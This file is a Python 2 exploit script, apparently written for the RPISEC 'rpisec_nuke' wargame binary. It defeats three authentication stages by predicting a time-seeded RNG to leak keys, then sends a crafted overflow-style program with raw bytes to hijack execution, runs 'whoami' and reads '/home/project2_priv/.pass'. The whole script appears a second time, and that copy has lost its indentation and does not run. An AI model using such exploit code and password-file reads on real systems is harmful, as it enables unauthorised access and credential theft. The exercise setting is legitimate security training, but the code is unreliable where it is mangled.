project2_auth.py

## project2_auth.py
#!/usr/bin/env python
# project 1 helper script
import subprocess
import binascii
import struct
import sys
import ctypes
import time
from operator import xor

def signThis(i):
    return ctypes.c_int32(i).value

# function to read the file descriptor until it finds a string
def readuntil(fd, needle):
    data = ""
    while needle not in data:
        data += fd.read(1)
    return data

def dumpOutput(fd):
    print "+---------------+"
    print "|****DUMPING****|"
    print "+---------------+"
    while True:
        sys.stdout.write(fd.read(1))

def tohex(val, nbits):
    return hex((val + (1 << nbits)) % (1 << nbits))

def dots(x):
    splitSize = 2
    ret = [x[i:i+splitSize] for i in range(0, len(x), splitSize)]
    return '.'.join(ret)

def xorChallenges(first_challenge, challenge):
    first_challenge = [''.join(x.split('.')) for x in first_challenge]
    challenge = [''.join(x.split('.')) for x in challenge]

    splitSize = 2
    for j in xrange(len(first_challenge)):
        x = first_challenge[j]
        first_challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)]

    for j in xrange(len(challenge)):
        x = challenge[j]
        challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)]

    # Xor all the values together
    xored = []
    for j in xrange(len(challenge)):
        x = challenge[j]
        y = first_challenge[j]
        xored.append([])
        for k in xrange(len(x)):
            a = ctypes.c_ubyte(int(x[k],16)).value
            b = ctypes.c_ubyte(int(y[k],16)).value
            xoval = hex(ctypes.c_ubyte(a ^ b).value)
            xored[j].append(xoval)

    for i in xrange(len(xored)):
       line = xored[i]
       xored[i] = "".join(["00"[len(x[2:]):]+x[2:] for x in line])
    return xored

def findChallenge(cline, ctime, offset):
    # Get our random numbers ( 4 needed )
    crand.seed_rand(ctime)
    rNums = []
    for _ in xrange(offset):
        crand.get_random()
    for _ in xrange(4):
        rNums.append(crand.get_random())

    # Get the integer values for xoring
    cline = ''.join(cline.split('.'))
    splitSize = 8
    words = [cline[i:i+splitSize] for i in range(0, len(cline), splitSize)]

    # This flips for little endian
    for wi in xrange(len(words)):
        w = words[wi]
        splitSize = 2
        words[wi] = ''.join([w[i:i+splitSize] for i in range(0, len(w), splitSize)[::-1]])

    intVals = [ signThis(int('0x'+x,16)) for x in words ]

    # Xor all the values together
    xored = []
    for i in range(4):
        a = rNums[i]
        b = intVals[i]
        xored.append(ctypes.c_uint32(a ^ b).value)

    # Turn the int values back to hex
    xoredHex = [ tohex(x,32)[2:-1] for x in xored ]

    # Pad those values with 0's for the memory
    xoredHex = [ "00000000"[len(x):]+x for x in xoredHex ]

    # Flip them for memory order
    for xi in xrange(len(xoredHex)):
        x = xoredHex[xi]
        splitSize = 2
        xoredHex[xi] = ''.join([x[i:i+splitSize] for i in range(0, len(x), splitSize)[::-1]])

    cAns = ''.join(xoredHex)
    #splitSize = 2
    #cAns = [cAns[i:i+splitSize] for i in range(0, len(cAns), splitSize)]
    #cAns = '.'.join(cAns)

    return cAns

# Import our rand seeder
crand = ctypes.cdll.LoadLibrary("./randlib.so")
crand.seed_rand(int(time.time()))

# run the project
#p = subprocess.Popen('nc warzone.rpis.ec 31337', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
#p = subprocess.Popen('/tmp/bleached/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
p = subprocess.Popen('strace /tmp/bleached/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)

key2 = '00112233445566778899aabbccddeeff'
key3 = ['00112233000000000000000000000000', '00000000445566770000000000000000', '00000000000000008899aabb00000000', '000000000000000000000000ccddeeff']

#key2 = '4e96e75bd2912e31f3234f6828a4a897'
#key3 = ['90357303000000000000000000000000', '00000000412ef8220000000000000000', '0000000000000000cd10e79800000000', '000000000000000000000000760491a6']

#############
# Third Key #
#############
p.stdin.write("3\n")
session = int(readuntil(p.stdout, "]=---------=|").split('\n')[-1].split(' ')[4][7:-7])
p.stdin.write(str(session)+"\n")
print readuntil(p.stdout, "CHALLENGE (64 Bytes):")
#GET CHALLENGE, GET TIME NOW
challenge = readuntil(p.stdout, "-------------------------------------------------------\n")
challenge = challenge.split("\n")[1:5]
challenge[0] = challenge[0][7:]
challenge = [l[30:] for l in challenge]
print readuntil(p.stdout, "TIME NOW:")
challenge_time = readuntil(p.stdout, "\n")
challenge_time = int(challenge_time.strip()[7:])

# Get the seed
CLine = challenge[0]
seed = 0
for x in range(50):
    seed = ctypes.c_uint32(challenge_time + session - x).value
    if findChallenge(CLine, seed,0) == "00000000000000000000000000000000":
        break

offset = 4
for x in xrange(4):
    challenge[x%4] = findChallenge(challenge[x%4], seed, offset*4)
    offset += 1

# Finally xor with the first_challenge to get the leak
challenge = xorChallenges(key3, challenge)

challenge_input = ''.join(challenge)
p.stdin.write(challenge_input+"\n")

##############
# Second Key #
##############
p.stdin.write("2\n")
print readuntil(p.stdout, "ENTER AES-128 CRYPTO KEY:")
p.stdin.write(key2 + "\n")
print readuntil(p.stdout, "ENTER LENGTH OF DATA (16 OR 32):")
p.stdin.write("\n")
print readuntil(p.stdout, "DATA LENGTH SET TO")
p.stdin.write("\n")
print readuntil(p.stdout, "AUTHENTICATING")
p.stdin.write("\n")

#############
# First Key #
#############

p.stdin.write("1\n")
p.stdin.write("\x00\n")
p.stdin.write("\n")
print readuntil(p.stdout, "+-----------------------------------------------------+")

###################
# ON TO BOOM BOOM #
###################

p.stdin.write("4\n")
print readuntil(p.stdout, "READY")
# My Program
#program = "ADOOM\x00\x00\x00" # 8 bytes
program = "I"*132 + "S"+'A'+"IS"+'A'+"IS"+'A'+"IS"+'A'+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00"
#program = "S"+'G'+"IS"+'E'+"IS"+'N'+"IS"+'E'+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00"
#program = "I"*62 + "OIOIOIOI"
#program = "I"*132 + "S"+s[3]+"IS"+s[2]+"IS"+s[1]+"IS"+s[0]+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00"
p.stdin.write(program*2)
p.stdin.write("\xa9\x59\xdc\xdc"+"\x4a\x00\x00\x00\x40\x45\x4e\x44\n")
p.stdin.write("\n")
p.stdin.write("CONFIRM\n")
dumpOutput(p.stdout)


print readuntil(p.stdout, "CYBER NUKE IS LAUNCHING")
print readuntil(p.stdout, "ATTEMPTING TO CONNECT TO UPLINK")
print readuntil(p.stdout, "EXECUTING...")
print readuntil(p.stdout, "MISSION SUCCESS")

# Got Root?
time.sleep(0.5)
p.stdin.write("whoami\n")
time.sleep(0.5)
p.stdin.write("cat /home/project2_priv/.pass\n")

dumpOutput(p.stdout)
	#!/usr/bin/env python
	# project 1 helper script
	import subprocess
	import binascii
	import struct
	import sys
	import ctypes
	import time
	from operator import xor

	def signThis(i):
	return ctypes.c_int32(i).value

	# function to read the file descriptor until it finds a string
	def readuntil(fd, needle):
	data = ""
	while needle not in data:
	data += fd.read(1)
	return data

	def dumpOutput(fd):
	print "+---------------+"
	print "\|**DUMPING**\|"
	print "+---------------+"
	while True:
	sys.stdout.write(fd.read(1))

	def tohex(val, nbits):
	return hex((val + (1 << nbits)) % (1 << nbits))

	def dots(x):
	splitSize = 2
	ret = [x[i:i+splitSize] for i in range(0, len(x), splitSize)]
	return '.'.join(ret)

	def xorChallenges(first_challenge, challenge):
	first_challenge = [''.join(x.split('.')) for x in first_challenge]
	challenge = [''.join(x.split('.')) for x in challenge]

	splitSize = 2
	for j in xrange(len(first_challenge)):
	x = first_challenge[j]
	first_challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)]

	for j in xrange(len(challenge)):
	x = challenge[j]
	challenge[j] = [x[i:i+splitSize] for i in range(0, len(x), splitSize)]

	# Xor all the values together
	xored = []
	for j in xrange(len(challenge)):
	x = challenge[j]
	y = first_challenge[j]
	xored.append([])
	for k in xrange(len(x)):
	a = ctypes.c_ubyte(int(x[k],16)).value
	b = ctypes.c_ubyte(int(y[k],16)).value
	xoval = hex(ctypes.c_ubyte(a ^ b).value)
	xored[j].append(xoval)

	for i in xrange(len(xored)):
	line = xored[i]
	xored[i] = "".join(["00"[len(x[2:]):]+x[2:] for x in line])
	return xored

	def findChallenge(cline, ctime, offset):
	# Get our random numbers ( 4 needed )
	crand.seed_rand(ctime)
	rNums = []
	for _ in xrange(offset):
	crand.get_random()
	for _ in xrange(4):
	rNums.append(crand.get_random())

	# Get the integer values for xoring
	cline = ''.join(cline.split('.'))
	splitSize = 8
	words = [cline[i:i+splitSize] for i in range(0, len(cline), splitSize)]

	# This flips for little endian
	for wi in xrange(len(words)):
	w = words[wi]
	splitSize = 2
	words[wi] = ''.join([w[i:i+splitSize] for i in range(0, len(w), splitSize)[::-1]])

	intVals = [ signThis(int('0x'+x,16)) for x in words ]

	# Xor all the values together
	xored = []
	for i in range(4):
	a = rNums[i]
	b = intVals[i]
	xored.append(ctypes.c_uint32(a ^ b).value)

	# Turn the int values back to hex
	xoredHex = [ tohex(x,32)[2:-1] for x in xored ]

	# Pad those values with 0's for the memory
	xoredHex = [ "00000000"[len(x):]+x for x in xoredHex ]

	# Flip them for memory order
	for xi in xrange(len(xoredHex)):
	x = xoredHex[xi]
	splitSize = 2
	xoredHex[xi] = ''.join([x[i:i+splitSize] for i in range(0, len(x), splitSize)[::-1]])

	cAns = ''.join(xoredHex)
	#splitSize = 2
	#cAns = [cAns[i:i+splitSize] for i in range(0, len(cAns), splitSize)]
	#cAns = '.'.join(cAns)

	return cAns

	# Import our rand seeder
	crand = ctypes.cdll.LoadLibrary("./randlib.so")
	crand.seed_rand(int(time.time()))

	# run the project
	#p = subprocess.Popen('nc warzone.rpis.ec 31337', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
	#p = subprocess.Popen('/tmp/bleached/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)
	p = subprocess.Popen('strace /tmp/bleached/project2/rpisec_nuke', stdout=subprocess.PIPE, stdin=subprocess.PIPE, shell=True)

	key2 = '00112233445566778899aabbccddeeff'
	key3 = ['00112233000000000000000000000000', '00000000445566770000000000000000', '00000000000000008899aabb00000000', '000000000000000000000000ccddeeff']

	#key2 = '4e96e75bd2912e31f3234f6828a4a897'
	#key3 = ['90357303000000000000000000000000', '00000000412ef8220000000000000000', '0000000000000000cd10e79800000000', '000000000000000000000000760491a6']

	#############
	# Third Key #
	#############
	p.stdin.write("3\n")
	session = int(readuntil(p.stdout, "]=---------=\|").split('\n')[-1].split(' ')[4][7:-7])
	p.stdin.write(str(session)+"\n")
	print readuntil(p.stdout, "CHALLENGE (64 Bytes):")
	#GET CHALLENGE, GET TIME NOW
	challenge = readuntil(p.stdout, "-------------------------------------------------------\n")
	challenge = challenge.split("\n")[1:5]
	challenge[0] = challenge[0][7:]
	challenge = [l[30:] for l in challenge]
	print readuntil(p.stdout, "TIME NOW:")
	challenge_time = readuntil(p.stdout, "\n")
	challenge_time = int(challenge_time.strip()[7:])

	# Get the seed
	CLine = challenge[0]
	seed = 0
	for x in range(50):
	seed = ctypes.c_uint32(challenge_time + session - x).value
	if findChallenge(CLine, seed,0) == "00000000000000000000000000000000":
	break

	offset = 4
	for x in xrange(4):
	challenge[x%4] = findChallenge(challenge[x%4], seed, offset*4)
	offset += 1

	# Finally xor with the first_challenge to get the leak
	challenge = xorChallenges(key3, challenge)

	challenge_input = ''.join(challenge)
	p.stdin.write(challenge_input+"\n")

	##############
	# Second Key #
	##############
	p.stdin.write("2\n")
	print readuntil(p.stdout, "ENTER AES-128 CRYPTO KEY:")
	p.stdin.write(key2 + "\n")
	print readuntil(p.stdout, "ENTER LENGTH OF DATA (16 OR 32):")
	p.stdin.write("\n")
	print readuntil(p.stdout, "DATA LENGTH SET TO")
	p.stdin.write("\n")
	print readuntil(p.stdout, "AUTHENTICATING")
	p.stdin.write("\n")

	#############
	# First Key #
	#############

	p.stdin.write("1\n")
	p.stdin.write("\x00\n")
	p.stdin.write("\n")
	print readuntil(p.stdout, "+-----------------------------------------------------+")

	###################
	# ON TO BOOM BOOM #
	###################

	p.stdin.write("4\n")
	print readuntil(p.stdout, "READY")
	# My Program
	#program = "ADOOM\x00\x00\x00" # 8 bytes
	program = "I"*132 + "S"+'A'+"IS"+'A'+"IS"+'A'+"IS"+'A'+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00"
	#program = "S"+'G'+"IS"+'E'+"IS"+'N'+"IS"+'E'+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00"
	#program = "I"*62 + "OIOIOIOI"
	#program = "I"*132 + "S"+s[3]+"IS"+s[2]+"IS"+s[1]+"IS"+s[0]+"ISRISAISLIS ISDISOISOISMIADOOM\x00\x00\x00"
	p.stdin.write(program*2)
	p.stdin.write("\xa9\x59\xdc\xdc"+"\x4a\x00\x00\x00\x40\x45\x4e\x44\n")
	p.stdin.write("\n")
	p.stdin.write("CONFIRM\n")
	dumpOutput(p.stdout)


	print readuntil(p.stdout, "CYBER NUKE IS LAUNCHING")
	print readuntil(p.stdout, "ATTEMPTING TO CONNECT TO UPLINK")
	print readuntil(p.stdout, "EXECUTING...")
	print readuntil(p.stdout, "MISSION SUCCESS")

	# Got Root?
	time.sleep(0.5)
	p.stdin.write("whoami\n")
	time.sleep(0.5)
	p.stdin.write("cat /home/project2_priv/.pass\n")

	dumpOutput(p.stdout)